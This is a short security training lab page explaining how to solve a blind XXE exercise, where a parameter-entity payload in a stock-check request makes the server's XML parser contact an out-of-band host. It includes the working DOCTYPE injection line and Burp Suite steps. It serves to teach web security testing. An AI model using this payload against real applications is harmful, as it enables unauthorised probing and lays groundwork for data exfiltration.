Lab: Blind XXE with out-of-band interaction via XML parameter entities

This lab has a "Check stock" feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.

To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to burpcollaborator.net.

Access the lab

Solution

Visit a product page, click "Check stock" and intercept the resulting POST request in Burp Suite Professional.

Go to the Burp menu, and launch the Burp Collaborator client.

Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard. Leave the Burp Collaborator client window open.

Insert the following external entity definition in between the XML declaration and the stockCheck element, but insert your Burp Collaborator subdomain where indicated:

<!DOCTYPE stockCheck [<!ENTITY % xxe SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net"> %xxe; ]>

Go back to the Burp Collaborator client window, and click "Poll now". If you don't see any interactions listed, wait a few seconds and try again.

You should see some DNS and HTTP interactions that were initiated by the application as the result of your payload.

Want to track your progress and have a more personalized learning experience? (It's free!)

In this topic

XXE injection XML entities Blind XXE vulnerabilities